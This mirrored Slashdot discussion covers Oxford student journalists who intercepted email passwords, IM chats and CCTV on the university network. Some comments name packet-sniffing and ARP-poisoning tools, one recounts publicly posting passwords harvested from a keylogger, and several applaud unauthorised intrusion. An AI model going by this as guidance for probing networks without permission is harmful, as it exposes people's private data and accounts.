Slashdot Mirror
Oxford Students Hack University Network
An anonymous reader writes "Both The Guardian and BBC News are carrying the story that two students at the University of Oxford, Patrick Foster and Roger Waite, were able to easily hack into the university's internal network in minutes using only easily-available software. Once inside, they could find out anyone's email password, observe instant messenger conversations and control parts of the university's CCTV system. The students were investigating the university's network security for the student newspaper, The Oxford Student, which published a front page article and editorial on the matter. In the article, a university spokesperson is quoted as saying 'In some cases the wish to provide the widest possible computer access as cheaply as possible may mean deciding to go for a cheaper set-up, with potentially lower security.' The students now face disciplinary precedings from the university and could receive rustication (suspension) and a 500 pound fine. The matter has also been passed onto the police."
What appropriately aged Slashdotter hasn't hacked into their university or college's network?
These are the future leaders of the world. Don't forget it.
Cheers!
Erick
http://www.busyweather.com/
... a.k.a. A Beginner's Guide to tcpdump and ettercap
Now that is a heavy fine.
The school is feeling embarassed, and vengeful, so they make an example of the students; the students were only hacking the network to produce a news article on the lacklustre security at Oxford. They have a right to obtain evidence to support an article on the security systems, even by showing how the system can be broken into. Students likely have been complaining about it for some time.
From my perspective, the student body has a right to be certain if the use of the school network is going to compromise any of their personal information. Do you know how many students use school networks to check banking information?
These white hat hackers have given the school a present and they are slapped in the face for it. Any action against the journalists will only smear Oxford's reputation further. They should simply thank them and make the necessary changes to improve security.
Shit, if I know this, and some multiple-PHD administrator can't figure it out, what does that say about the level of comprehension at Oxford?
The dangers of knowledge trigger emotional distress in human beings.
Move on. How many stories have there been on slashdot of this exact same thing happening?
A works for/goes to/etc B.
A finds exploit in B's Systems
A exploits systems.
A finally gets around to telling B.
A gets in trouble for violating laws and/or rules of B.
Your hair look like poop, Bob! - Wanker.
.. has to be having the police handle a situation that they don't understand.
What do I have to do to get a sig around here?! www.bearscanfly.org
Comment removed based on user account deletion
Why did they use names in the paper--they could have used an anonomyous source.
They should be damn well "rusticated" for their tast in music alone!
An IT Officer at College A said: "Short of keeping the network as segmented as possible, there is very little we can do." In a warning to students, he added: "I am able to monitor my network, and student regulations mean that any member abusing it would find themselves before the Dean."
:)
;)
Er, require strong passwords? Hm, yeah, that'd work, and I guess it is "little" to do
The OxStu has agreed not to pass on the methods used to carry out such actions, which fall foul of both the law and OUCS guidelines. One computer expert told The OxStu that the actions were virtually untraceable.
How clever of them -- security by obscurity. I'm sure those "methods" would be far too complex for us to understand anyway, right?
It can take less than a minute to obtain an individual student's email password. A student at College B whose password was compromised told The OxStu: "It's absolutely ridiculous that security could be so light. I'll certainly be changing my password regularly in the future."
Oh! So that's it. Weak passwords (or maybe a little social engineering, or both.) Gosh -- better keep a lid on that secret.
everything in moderation
They will be punished and fined for embarassing the school, not because they broke the law.
ogg
Black cat, searing pain, flames...? I must be in Heaven! - Homer Simpson
This should be a valuable lesson to everyone, always get permission before "investigating". Surprisingly often, you can get permission--especially if you represent something like a campus newspaper, where they can assume you'll be responsible.
They could have asked for permission to attempt and hack into the network before actually doing it. At my university, there was a group of students who asked to test the network security and they got permission to try in the summer between a summer session block when not too many people were using the network. It also meant that when they printed their findings, not too many people were around to read it because it was obviously summer session. They didn't find many security lapses, heck if I remember correctly it was printed up on page 6 of the student newspaper.
So next time u are in UK and you see someone forgetting to lock his door or forgetting his bag beware before you go and tell him ... U could be a possible housebreaker or a purse snatcher. Come on guys this a couple of collge students finding a flaw in their universities system which may compromise their privacy and bang .... they get punished !!! Ok ok they went for some publicity but shouldnt Oxford just say thanks and bash/change /think abt their network administration
See what investigative journalism gets you? You'd be better to leave it all alone and let the system be full of holes. I mean, we don't want responsible people to break in and tell us what our problem is. We'd rather someone malicious got in nice and quiet like, and we would never know the difference.
Bloody reporters. Free speech be damned, this time they have gone too far.
Absolutely. The Uni's should try and foster an open environment, and not be so bloody harsh on students - who, do occasionally 'bend the rules'.
This is probably the only time in peoples lives that they can experiment like this, and they shouldn't be heavily fined/expelled/sued. Maybe a formal 'slap on the wrist', but that's it.
Its Uni - not a top secret government agency.
You can't expect to wield supreme executive power, just because some watery tart threw a sword at you
While this is an extreme hack and what not, you'd be surprised about how much resistance there is to security on a university setting. When my university installed email/virus scanning software, it was a HUGE deal and nearly wasn't installed because of concerns of academic freedom.
When I suggested turning on the Windows Firewall on Faculty PCs, I was told that it was a no no because it could interfere with Academic freedom. Freedom above everything else is the university motto.
> They could have asked for permission to attempt and hack into the network
They wouldn't give the journalists permission to do that, because it would involve spending money on improving security, plus most higher ups are computer peasants. Hacking the network was half an act of civil disobedience and the other half of journalism. Either way, Oxford has some dumbass administrators on high, if they follow through on the charges.
Speaking as someone who sysadmin'd at one of the top five universities in my country, I can say that most universities are like this.
Security is lax, well, because the information that someone would want to steal is usually already available on the various faculty websites.
The only things I can think of that are actually worth securing ARE secured. Who cares if these guys can change someones email password. Most uni students don't even use their supplied email addresses, and they are usually only used as a redundant means of sending out marks. I wouldn't be worried about the CCTV monitoring either. It's not like the CCTV was viewing some "restricted" area of the university. Want to see what's going on? Walk down there and take a look. *gasp*.
I'm probably being a troll (I can't even tell anymore) but honestly, most university security is so lax because there simply isn't that much data that requires securing.
--
The last digit of pi is four.
The intent of the students was to act as journalists in the interest of the student body. They have every right to force the school to increase spending on sedcurity. If anything, Oxford could find themselves sued by the student body over this.
It was a risky move, but there was no other way to force the school to change their policies.
If they were Americans they could be in Camp Xray already playing naked pile up with a hood over their head. Our 'Patriot' act would see to that. Did anyone else see that the Bush administration admitted the other day that the Patriot Act is being used for routine police investigations such as porn and kidnapping?
Liberals call everyone Nazis yet they are the closest thing to it.
White-hat my ass, they didn't ask for permission to crack the system first; they did it, THEN told them they did it, how easy it was and oh yea, it was for altruistic purposes.
In this day and age of computers being ubiquitous with education, and many college kids, regardless of what school you end up going to, not knowing damn near the first thing about computer security, rooting a system is hardly an accomplishment. What it is though, is invasion of privacy, more then likely an infringement on the User Agreement which all colleges I've been to have to get on their network, and a really REALLY dumb way of propping yourself up to look cool.
As for What they did, looking into MSN conversations isn't hard, it's plaintext across a network, set up a box to dump all the shit it gets and voila, hours of juicy reading material.
E-mail passwords are also easy to get plaintext, unless the users of the network use some type of security layer, (SSL and the like) otherwise if you go to a normal webmail account, (http://webmail.schooname.com) you send your shit plaintext most of the time, Purdue, BSU, and a few other Indiana schools do that.
The only thing I think that is dumb on the administration's part is having the Closed Circuit Televisions controlled via the internal network, that shit should be on a totally different network, that is the only real folly I see that is just nasty. Otherwise most of the shit is just because people are not security conscious.
Do you even know what "rule of law" means? It means NO ONE is above the law. Not the president, not the police, not even investigative journalists.
What the two students did was clearly in violation of university policy and criminal law, and need to be punished accordingly.
Yes, the fact that their primary intention was journalism should be considered as a mitigating factor, but I see no reason why it should get them off the hook for having committed several crimes.
Really, they broke the law for a sensational story for which they could have written a less interesting story without the privacy violations. I don't consider them to have a "journalistic duty to society" justification.
... the admins should get chewed out), would have gotten their story, and so forth. Oh, and this assumes that they notified the admins far enough in advance of their publish date that the problem could be *fixed* before all the students at the university were told about it -- unlike the Manhattan Project, where a couple more guards can just be rolled out or reassigned from another location temporarily, it may take a bit to test software changes before a rollout is appropriate.
I can understand journalism where people trespassed on the Manhattan Project grounds. There's really no other way to demonstrate that you can get into nuclear research facilities other than to do so.
On the other hand, they could have easily said "we have found the following vulnerability, which probably allows us full access to X, Y, and Z". They would have done their security work (and if they got hammered by the network admins for probing the network, I'd agree
Besides, if all it takes is the willingness to write an article later to avoid getting in trouble, people can be poking around some awfully dicey places.
May we never see th
> I don't buy their arguments about doing all of this in the best interests of the school.
Someone who has obviously never gone up against a belligerent administration before. This was the only way to get the money required to make changes to the security. Without proof there is but conjecture and speculation.
Reminds me of my first year in college where I tried logging into the school server from my dorm computer on the school network with login root and password root....
:-)
:-)
I was just curious at the time
A day later I get a rather straighforward e-mail from the system op, telling me to stop, or they will report me to the appropriate authorities, and about possible disciplinary options.
Well at least I found out that they were smart enough to change the password, and keep on eye on what people were trying to do
.... ... }
int main (void) {
University IT network wide open to hackers
Email passwords and MSN Messenger Conversations easily accessible.
CCTV networks can be compromised.
University says colleges' drive to cut costs could compromise security.
Computer networks across the University lie wide open to hackers, due to serious failings in IT security provision.
An investigation by The Oxford Student has learnt that CCTV cameras, email passwords and MSN Messenger conversations can be compromised with ease by members of the University with only a modicum of technical knowledge, jeapardising the privacy and safety of students and dons alike.
It is understood that by using software that is freely and easily accessible over the internet, every student has the power to snoop on the MSN Messenger conversations of others or infiltrate their Webmail account. More advanced users can even tap into college CCTV networks, with the possibility of disrupting the entire system, forcing colleges into total security blackouts.
A University spokesperson told The OxStu: "In some cases the wish to provide the widest possible computer access as cheaply as possible may mean deciding to go for a cheaper set-up, with potentially lower security." Just how low the security across the University has now become clear.
Access to the video-streaming of CCTV footage of College A was easily available, pictured right, and cameras across the College could be taken down at the touch of a button. One student who appeared in security footage accessed said: "As well as understanding the security implications, it was personally shocking and especially worrying."
As such networks are put in place to safeguard the security of College members, the fact that they can be easily bypassed should send a serious message to staff responsible for their upkeep.
An IT Officer at College A said: "Short of keeping the network as segmented as possible, there is very little we can do." In a warning to students, he added: "I am able to monitor my network, and student regulations mean that any member abusing it would find themselves before the Dean."
The OxStu has agreed not to pass on the methods used to carry out such actions, which fall foul of both the law and OUCS guidelines. One computer expert told The OxStu that the actions were virtually untraceable.
It can take less than a minute to obtain an individual student's email password. A student at College B whose password was compromised told The OxStu: "It's absolutely ridiculous that security could be so light. I'll certainly be changing my password regularly in the future."
Likewise at College C a first year student's Webmail password was obtained. The student told The OxStu: "I'm outraged. I've personal as well as employment and academic related information in my account, which is private." College B's IT Officer said: "There is a rolling programme to upgrade [the network]...If students are abusing it, it is a concern."
Similarly, conversations held over instant messenging programmes can be easily intercepted. A Human Sciences student said it was "insane and quite disturbing...not something you want others to see." Her conversation was eavesdropped upon as she told another member of the same College about her essay crisis. One student at College D, who declined to be named, told The OxStu the problem was "shady", as we recounted her conversation to her. College D refused to comment, on the basis that it felt the law had been broken in relation to these activities.
A University spokesperson said: "Security measures are constantly reviewed in order to minimize the security risks. Of course, anyone found to have breached security with ill intent would be subject to punishment."
At the time of going to press, The OxStu was in the process of handing over all the data given to the investigation to both the police and the University.
Quite apart from University Regulations students should be aware of 1(1) of the Computer Misuse Act 199
>>were able to easily hack into the university's internal network
So what? It is always as easy especially if you are some kind of insider. But normally you do not hack your university for good reasons:
a) It is yours.
b) You will get a lot of trouble / lose accounts.
I think the university officials need to thank the students for their work in exploiting the security vulnerabilities.
/.
MAYBE, if their exploit didn't involve publishing the vulnerability to the general populace. Worst case scenario, it gets picked up by the BBC and/or
It is 100 times better for two students without malicious cause to break into the internal networks than for malicious individuals to do the same.
They've publicly invited every literate/malicious individual to do so. Getting a killer scoop at the expense of the school's security comes close enough to malicious in my book. In the real world, few (statistic pulled out of my ass based on number of companies/organizations who plug in/install and go, not size or profitability) have "adequately" secure systems, be it the refusal or inability to spend the time or money do so, let alone keep up. Anonymity IS part of a system's security. By publishing this article they've opend up the schools network to attention it wouldn't have received othewise. Mabe the Admins will be able to make necessary adjustments before backdoors are added. Maybe they didn't even have the staff to secure it properly. Point is, the consequence of their actions is that students are more vulnerable than they were before the story was published. Intentions be damned, they f^@%ed up.
Michalangelo Progr
But the police should be called, and when they see how lax the university was at keeping sensitive information private, they should file charges against Oxford too.
Then they can put Oxford Hack in the dictionary:
Someone who tattles, and gets in trouble too because of their guilt in the incident.
Saskboy's blog is good. 9 out of 10 dentists agree.
Relevantly, they managed to find and clamp down on compromised boxes (usually Win, or unpatched linux boxes) pretty quickly. They also had some very good techs (as well as some pretty nifty stuff, eg ADSM backup of private machines for all users).
Based on the info these guys say they got, it looks like at least partly what they were doing was just packet-sniffing. Not sure how the cctv stuff works, as I know the newest cctv gear has been installed since I left.
If it's just that, then there is at least one precedent at Oxford, as a number of passwords of POP users were captured by a compromised linux box (vanilla, unpatched RedHat 3 or 4, iirc) in about 98 or 99. OUCS detected the box, and then the sniffing, within one or two hours and froze all accounts, which I thought was pretty good going for such a huge place.
I'd have preferred if these guys had just told OUCS in private, instead of trumpeting about it in the papers. Wouldn't surprise me if they were charged ... I wonder if Thames Valley Police will run the investigation? :)
Just script kiddies. They managed to hack in ... but they didn't manage to escape detection. Does it really matter if you can't get out cleanly? Now they're going to be facing heavy penalties. They should have planned it out better before they undertook their hack.
Cyde Weys Musings - Scrutinizing the inscrutable
probably just trying to divert people's attention from what would be a highly embarrassing situtation for them.
This isn't the early '80s folks.
Breaking into other people's computers without permission is a Very Bad Thing and an example must be made.
These students should've faced criminal charges.
Having said that, they had good intent, and deferred adjudication with a a year or so's probation, a weekend in jail, and a fine they could work off with community service hours* would be appropriate. If they meet the terms of their probation, their criminal record can be expunged.
*appropriate community service includes helping audit security for the university's computers.
Knowledge is how to play a game, intelligence is how to win, wisdom is knowing what game to play.
Otherwise, he gets the blame. Believe me, I've been there. Unless you can document that you had a solution in mind, they'll "hang you from the higest yard-arm".
It was a close call my friend, mighty close.
The simple truth is that interstellar distances will not fit into the human imagination
- Douglas Adams
Imagine never failing another subject.
Imagine being able to push your enemies down a grade.
Imagine making some extra cash selling exam information.
Imagine trashing the occasional file to irk a disliked professor.
Imagine that the organisation responsible for stopping you doing these things spends more time complaining about white hats than it does stopping black hats.
Imagine how much easier life would be not doing the right thing.
Just imagine...
Whether they did for self aggrandisement or not, whistle-blowers make it safe for the rest of us. I don't have the skill to test security like this. But its nice to know that there are self-serving show-offs who will do it for me. More power to them.
True the students were producing a news article about the computer security at Oxford, but is hacking the same system a good idea to do? If we were to allow that to go unpunished, what would happen next? Would we let people who bring bombs onboard airplanes go 'because they wanted to show how lackluster airport security was'? Would we let people who speed down highways at dangerously high speeds on purpose 'because they wanted to show how lackluster funding to police made them unequiped for ultra fast muscle cars'?
This goes beyond public appearance of the college. What do you think Slashdot would do if you were to post a comment here explaining how it is possible to hack and take down the Slashdot server without asking for their permission to publish it, let alone attempt to confirm it? You'd have your user account banned to say the least. You wanna publish an exploit to the newest version of Windows Internet Explorer without telling Microsoft? Go ahead, but you mighta just caused the newest virus outbreak. You wanna publish how you managed to hack into the CIA database? Go ahead, but Russian KGB hackers just used that exploit to gain access their systems. Etc, etc, etc.
Wait, these guys can get into Oxford and they don't know better than to write these types of articles anonymously?
I don't know if Oxford should be more worried about their network or their entrance standards....
Punctanym: alternate spelling of words using punctuation or numerals in place of some or all of its letters; see 'leet'
Nowadays I'm more of the opinion that companies and universities don't care whether or not you can unravel their sweaters by pulling at a single string. It was a cute trick 10 years ago, but its just getting tiring now.
Alot of modern society is based on such concepts as "trusted networks" - not in the computer sense, but in the social sense. You're free to the services an entity provides, but please don't abuse them.
Personally I think it works better that way.
--Terence J. Grant
What country are you from btw? I only ask because in the USA, there's a whole host of information that have access controls set on them by the Federal Gov't. Especially medical information... with the new laws they've passed, god help you if you screw it up.
As someone who sysadmin'd at one of the top five universities in his country, I find it disturbing how easily you dismiss student's e-mail addresses. Did it ever occur to you that... someone might actually send mail while pretending to be someone else!!! Some college's and uni's send grades, schedules and who knows what else directly to students' email. Pretty handy for a stalker right?
maybe you're just getting a little excited, because I don't think you're trolling. Otherwise your statements would suggest extreme incompetence.
And why is this? Maybe we have different ideas about what constitutes "information worth stealing"[Fuck Beta]
o0t!
They also have to learn that it doesn't pay to go against the system... ;p
Shouldn't that really be Oxidation?
Believe me, I'm as surprised by my comment as you are.
An IT Officer at College A said: "Short of keeping the network as segmented as possible, there is very little we can do."
Somebody fire this person.
The FBI had been informed about both the first and the second WTC attacks, but didn't do shit to stop them.
If it had been more widely publicized after the first WTC attack, then maybe they would have done something to prevent the second.
Well yes, keeping a network segmented and firewalled where necessary is a part of it. He claims he's able to monitor his network, but apparently doesn't bother to. Arp cache poisoning attacks are pretty loud and easily detectable, even with inexpensive hardware and software. Of course someone who puts a CCTV security camera network on the same network segment as the one providing student access isn't particularly concerned with security.
I made a deal with the school... Don't expel me... I'll help you fix it. Also admitting through an anonymouse hotmail account helped... especially since every time i logged in it was from the school IP address.
DarkMantle I been bored, so I started a blog.
Whitehats hack with permission. A security consultant you pay to check your network is a whitehat. Someone that hacks it on their own is a blackhat. There is NO right to obtain evidence through illegal means. You must ask permission first.
Let me turn it to the real world. Suppose I break in your house (something I'm sure I could easily do, 99.999% of houses have shitty physical security) look at your things to see what I could get at, then tell you about it later. Is that ok? I mean I didn't hurt anything, and I gave you a report, so it;s ok right? Wrong, it's not ok, I broke the law.
Same thing. You aren't allowed to hack systems without permission. I don't care why you are doing it, you still aren't allowed to. This isn't a matter up for debate, it's the law, and it directly relates to physical privacy and security laws.
Your stuff is your stuff, and the rest of the world is welcome to keep the fuck out.
Here's the deal, before you all start burning megabytes on the debate whether or not this people were whitehat or blackhat, or whether it creates a slippery slope that will usher in a horde of script kiddies, there's one thing that you all need to remember:
This was an action of the press.
Let me repeat myself, because it's important.
This was an action of the press.
It is the purpose of the press to keep whoever is in power accountable. In the United States of America, this role was so important that until the mid 1970s* the press was considered to be the fourth branch of government. Now things might be a little different over in the United Kingdom, but the last time I checked, their press sometimes tries to expose and keep in check authority there as well.
This isn't a bunch of kids who hax0r1zed the system, and then cranked out a Cult of the Dead Cow text file, and said, "You g0t p0wn3d - but w5 R da Pr3ss."
These were members of the legitimate press, who in the course of their duties as members of a free press, alerted a population about a situation where the authorities who they trust to provide security have failed in carrying out their responsibilities.
* Okay, maybe that 1970s remark was a little sarcastic, but with all the media consolidation by the same megacorporations who buy and sell the elite of the american government, can you really describe it as the fourth branch of government anymore?
HaXXXor.com - Naked Chicks Teach You How To Ha
to avoid the expected karma-shelling.
The university I work for actually has fiarly good security over all. Not great, but better than many. However for things like finincials and student records, the security is much better. Just because you can get in to a system doesn't mean you can get into the IBM mainframe that holds the important data. You might be able to sniff a cleartext AIM converstion, you won't break the AES encrypted link someone is using to the mainframe.
I don't know Oxford's overall situation and frankly, I don't really care. I'm concerned about a department at my university. However I do understand that a university environment places unique constraints on what you can secure. Much as we'd like to lock everything down really tight, we simply aren't allowed to, generally in the name of academic freedom.
For example we manage most, but not all, of the systems in the building. Manage means have the admin/root password, apply patches, etc. However some research labs won't allow that. Guess what? They are the ones that get viruses or get hacked. REason being they don't secure their systems properly. Well, nothing we can do about it. The faculty comitte, department head, dean, president, and reagents all support people running their own systems in the name of academic freedom.
I am appalled at the number of people justifying what Oxford Univeristy is attempting to do. Have you heard of Whistleblowing, which I consider a fundamental service to any functioning democracy?
Look Oxford has been entrusted with the personal information of their students. They are the ones that should be facing the heavy and lorn arm of the law and not the students that brought the problems to everyone's attention.
As long as they did not do any harm, and they didn't, these students ought to be rewarded, not punished. How the fuck are you supposed to find out if a university is doing what it's supposed to? Are we supposed to just take at their word?
I don't think so!
Pragmatism as an ideology is not particularly pragmatic in the long term. Keep it in mind when you dismiss Free Software
They should've given some sort of warning to what they were going to do, or try to do. And if it could be accomplished, show Oxford the easy holes in their security sys. I mean, they should be greatful for having a free personal security check. :-/
(Don't big companies do that? Hire "hackers" to see if they can find loop holes in their network security.) Anyways...
----
Easy way to make $$$$ fast. Press shift + 4 a couple times.
Before you critisize someone, try walking a mile in their shoes. Then when you do critisize them, you're a mile away and
What's going on ? When I was a student, our teachers offered highest marks in system programming to everyone who could hack the department network. A student had a choice : to study everything or just to prove himself capable. After each sucessful break in, the hole was patched and the network became more protected.
This is the proper way. But making the unprotected network and call police... it's a degradation.
But they still sat around, snooping for three days.
are the ones who setup the systems, including those who approved of it. yes, i know oxford is a really poor college, and their students all come from the english countryside for them to justify their rants of giving their students free connectivity.
as is the case with any spokesperson (in this case, university spokeswoman), bullshit has been spewed.
and where is the interview with those who were managing this setup, i wonder?
Piss off!
What did the do ...
...
login
su root
Password : password
OMG the password was password
WOW THIS IS JUST LIKE EVERY OTHER NETWORK SERVER !
- MOSKIE
This was just a couple of punk-ass script kiddies trying to make the school administration look bad. Seriously, what did they think was going to happen? It's one thing to do serious research in an ethical manner, and another to play 31337 h@xor script kiddie under the guise of journalism. They aren't even good script kiddies -- they got caught way to easily.
It's a university--a place of learning and cooperation. You shouldn't lock it down any more than a campus should be run like a high security prison.
If the university actually did run the network securely, shutting down most ports, controlling what kind of software people get to install, enforcing password and security policies, then people would bitch about how much the network is run like a police state.
That doesn't mean individual services shouldn't be more careful--access to CCTV cameras should, perhaps, be locked down (or they should be completely open).
Shouldn't the school face some kind of punishment for encouraging and/or requiring use of a network which is by design not secure?
Europe has some very strong (quite paranoid, probably too paranoid) data protection laws, and while I don't support just hacking everything in sight and shouting about it from every rooftop, something needs to be done about the people who didn't do enough to protect the computers and networks.
-PM
500GB of disk, 5TB of transfer, $5.95/mo
Another interesting article by Patrick Foster can be found here
fifteen jugglers, five believers
Mr Foster contacted the university for comment, revealing how he had gathered the information. He received an email from the proctors saying they had reason to suspect he had committed a criminal act and would be referred to Thames Valley police. Half an hour later, and three weeks before his exams, Mr Foster's university email account was cut off and all his IT privileges were revoked.
So he waved his name around before the article. In any case (I imagine) the Uni or police probably would have slapped the paper a fine or done something nasty to go after the names. Of course I'm thinking of Australian Uni's here.
Jeeze, haven't we heard this one before? I find it so funny that frightened institutions always punish those who freely publish their experiences to help fix security holes. All this does is to give hackers an incentive to leave the holes be, and potentially make money informing a select dubious few about them.
OK, so the need for better network security with a bunch of 17-18 year olds around is obvious and they wanted to prove it. That's all fine and good. But why in the world did they put their names on the article?!
As an aside, my school (a university of california campus) uses different vLANs for each student computer lab, on a seperate subnet from anything else. Core campus systems are protected, student accessible ones using mainly Kerberos.
Sony ha
Whether they did it for the good of the school or not, what they did was wrong, wrong, wrong. Is this what novice journalists are being taught, that the ends justify the means?
If they did it to help the school, they should have known that there were risks involved and taken these risks into account before publishing.
In looking over the newspaper website, I see that this is published by the Oxford Student Union; I have no knowledge to the contrary, so I will assume that the publication is done without editorial overview from a faculty member who would (it is to be hoped) point out such dangers to these nascent Woodsteins.
Stephen R. Schaffter schaffter@schaffter.org http://www.schaffter.org
If the university uses CCTV to monitor the activities of people on its grounds, then those people _should_ have access to the camera feeds. The students (and staff etc) should have to right to check what the security staff are getting their voyeuristic jollies from at any time. Any organisation that performs this wide-scale CCTV surveillance has an obligation to provide access to anybody who has legitimate business on the premises who wants to see what is being filmed.
It does seem, though, that this security breach allowed unauthorised _moving_ of the the cameras, which obviously should be restricted to avoid abuse.
sustainable living
"We discovered som security issues on the network that were swiftly remedied by the administration" is a win-win situation for both parties.
"We discovered som security issues on the network that that the idiots at administration are to dumb to fint and correct" is not.
Actually, I think the second alternative makes you look very unhelpful and most people don't like their kind...
thats a heavy fine - they using stone tablets over there still?
Prosecute the Messenger
Irritable, left-wing and possibly humorous bumper stickers and t-shirts
I've audited everything from banks to schools and I must say that a College campus network environment is by far the most unique environment that I've ever audited.
Corporations, banks, etc all work to protect themselves from the internet, whereas colleges need to protect the internet from their internal users. Its a very interesting paradigm shift.
I've seen universities that literally connect the internet to the DMZ interface on their firewall, and then connect the residential dorm network to the external interface. (Thereby trusting their students less than they do the entire internet.)
That being said; Kids are curious, and they're learning about computers and exploring their environment. If the network admin's have done nothing to protect their network then I say they're at fault, but I highly doubt that is the case. I've worked with all types of educational institutions, from catholic girls schools to Ivy League institutes and none of them were irresponsible when it came to their security.
Nobody is saying that they need to completely lock down the entire network and turn it into a prison camp, they simply need to perform their due-dilligence to protect their network.
The three pilars of computer security consists of Accessability, Availability, and Integrity. For the college, integrity is the most important. You don't want kids creating, modifying, or deleting their attendance information. You want to make sure that information is available to the users and that access to that information is accessable by those whom are authorized to access it.
Yes, it is possible to hack any network and perform arp cache poisoning (just check out the tool Cain & Able @ www.oxid.it) and you can see how powerful these hacking utilities are and how easy it is to capture data like this - intercept IM conversations, decrypt passwords and create a whole lot of problems for responsible admins.
From the sounds of this article, it looks like they came across this Cain&Able utility, played with it, and wrote an article saying that university staff was incompetent when in fact there is little to nothing that an administrator can do to protect against such an attack short of creating a prison camp of a network.
I say that they should make an example of these script kiddies.
Good security is based upon reality and common sense. Common sense is a function of having common knowledge.
Just another case of glaringly unthought-out actions of script-tards. Anybody's dead grandmother can download a prog that sniffs or bypasses unguarded networks, especially if you have some kind of inside access in the first place. Give me a brake. These guys are probably happy they got their 15 minutes of fame.
The Oxford student newspaper guys are angling to get a nice job on Fleet street after graduation, and are trying to come up with attention getting scoops. If their real intention was to help the network sysadmins, they should have brought this up privately (since the article doesn't mention it, I assume they didn't.)
Instead, they went to the front page. I wonder why they didn't stop to check with the Uni? Perhaps they were afraid that locking down the network would have prevented their scoop?
If you want to class these guys as do-gooding whistle-blowers, it's a tough task. Should they be punished? Yes. What if, in order to prove their point, went in and read your e-mail after hacking your account? Or their off-the-shelf hack-kit contained malware that trashed your directories? Still keen on this kind of "journalism"?
They could, perhaps, have avoided problems and gotten their scoop, by having a few users consent to being hacked as a demonstration -- if, of course, the hacking was just a packet sniffer.
Protect your liberties. Donate to the ACLU
Make mental note never to enroll in Oxford.
Many modern CCTV systems offer the ability to zoom in and out, do various manipulations to the image quality (brightness, etc), and the more advanced cameras will also pan/tilt.
Trust me I know. I've "discovered" our high school's CCTV system. Its neato. You can go from a camera near the ceiling in the cafeteria and zoom in to see the words on any student's papers at the lunch tables.
Just a thought. Call the entire matter a security audit. Bill for 1 pound.
Lets the university know that their only interest was in determining the university's ability to safeguard critical data, some of which happens to be their own.
After all, it's worth finding out for yourself if a criminal can break into your university's computer, isn't it? I mean, you could ask the university, but could you trust their answer if it wasn't "Well, we're probably vulnerable"?
--------
Bleah! Heh heh heh... BLEAH BLEAH!!! Ha ha ha ha...
It was later recorded by the university database that not only did they promptly pay the find, they _overpaid_ by almost 2000 pounds. Of course, a refund was issued instantly.
Couldn't figure out why they were snickering though?
Along most coastlines, cliffs are not fenced.
What do you suppose we should do to people who try to prove that cliffs are dangerous by jumping off them? Assuming they survive?
Of course if there are lots of tourists visiting a particular cliff, then, these days, they do fence it.
Hence you could fence the computer science/Info tech studies cliffs, but you could probably get away with leaving alone the accounting and psycholgy studies cliffs. So long as none of those student/tourists bring any CS/IT students/tourists...
Maybe the cliff metaphor is limited. Perhaps a closer one is that most of the office blocks around my town do not have bollards around the floor to ceiling windows on the ground floor. However, I sure as hell am NOT going to drive a truck through any of these windows to prove how insecure they are.
"A major security flaw was found in email today. Your email client may be leaking your password out onto the internet for hackers to see. Users should change their password on a weekly basis to protect themselves. People are also being told that they should stop using the words 'Love, Secret, Sex, and God' as their passwords. More at 11."
Go not unto/. for advice, for you will be told both yea and nay (but have nothing to do with the question)
Well, fiddling around in our lab comps, having nothing better to do I did a find files for files containing a wierd substring from my password and to my lasting surprise found that one of the resulting file was a keylog. I saved the keylog and googled for the symptoms, found out what keylogger it was and removed it. I went to the central comp lab and changed all my passwords immediately and then told the best of my friends about it. It was a pretty big file full of keystrokes. We decided to look into the logs and came up with a list of lots of usernames and passwords in abt a months time...
Then we put up a notice asking everyone to change their password and a week after that we put up the list of username and passwords on the student wall magazine. Now, a lot of passwords were funny in themselves... Some were laughably trivial.. others told u what/who the chap perhaps thinks abt the most... so it was all in all a funny article that we got.
Of course a lot of lab users did raise privacy issues. They specially seemed to mind that one month delay in informing them abt the keylog. We never informed the institute because all that would have achieved is loss of freedom and stricter rules and usage p[olicies.
Someone did complain after the article came out and we were let off with a warning from the institute. Also, we never came to know who installed the keylogger.
Well considering the number of people we got angry, I think we should have rather told the authorities but then the same people would be angry about that since it would definitely result in a significant loss of freedom.
You don't have a right to try and break in to places you do bussiness at. Try it if you like, try and break in to your bank, but don't bitch when the cops haul you off to jail.
If they suspect a problem, they need to talk to the school about it and get permission. Just running off and doing it isn't acceptable.
You are free to test the security of things YOU OWN. You can break in to your house, you can hack your own computer. You can break the window of your own car. However you can't do any of those things to someone's property you just happen to use. Just because you have an account on a system I own doesn't give you permission to hack it. Just because I'm storing your bicicle for you doesn't give you permission to break in to my garage.
Look, I'll even entertain an argument that the law should be changed to make it legal, though I disagree, but you can't claim this isn't what the law is. Hence, they didn't have a right since they were breaking the law.
This was the first email I got when I decided to go the route of notifying them directly rather than publishing my findings:And this was my subsequent response:Which finally resulted in this (I guess it was escalated):I never heard back, but about three months later it was finally fixed. THREE MONTHS. Sometimes a little fire like an article is necessary to get bureaucracies moving.
I disagree with you here:
;-)
1. break into your house to show you how easy it is. It will really help you out in the long run, and you should thank me.
I see a lot of value in this. I latley saw a TV program that showed how easy it is to break into a normal (let say un-patched) house. I take is seriously now, as I previously felt secure.
2. show the pilot on the next flight I'm on how easy it is to get a gun through airport security
Applies to the logic on point 1. If you can show this to be true, we all will be much better off.
3. show the Secret Service (hey, this is sarcasm. I don't need you guys to visit) how easy it is to jump the fence at the whitehouse and run across the lawn
Yes, but show me how you can do this undetected and potentially kill the president? (I am not daring anyone to do this, nor implying that I would want to kill anyone!
4. stick up the local bank to show them how bad their security is. I could write a really good article on that. Obviously I would give them their money back, so there isn't any harm in that. Right?
Sure, again I would love to see how you do that, as it is MY money I keep in the Bank, because I think it is secure. Proove that it isn't and I will make sure my bank upgrades their security.
they got caught way to easily? As far as I understood they published their findings... that does not account to being cought in my world...
I believe journalism has to cross the boundries of ethics once in a while to mantain our freedom. If anything they wrote was a lie, that would be different, but they did factchecking!
I don't desire for them to be punished, but I am capable of observing, and performing some simple Cartesian logic, so I ask myself - what were they thinking? Why would they want to publish this data in the newspaper that those other than the property owners could have easy access to the property? I don't really see what is to be gained from that by anyone - not them, not the property-owners, and not the general public. I could really care less if it easy for someone to use property that someone else claims is "their" property.
I remember on the old GNU machines, Richard Stallman's username was rms, and his password was rms as well. People used to hop around talking about that, how great they were for having "guessed" it and how supposedly "insecure" his account was, but I think they missed the whole point, and the much bigger picture.
This news was pubished over a month ago, i'm surprised it took so long to reach /.
Obviously, now. Before hand, how could they have shown it?
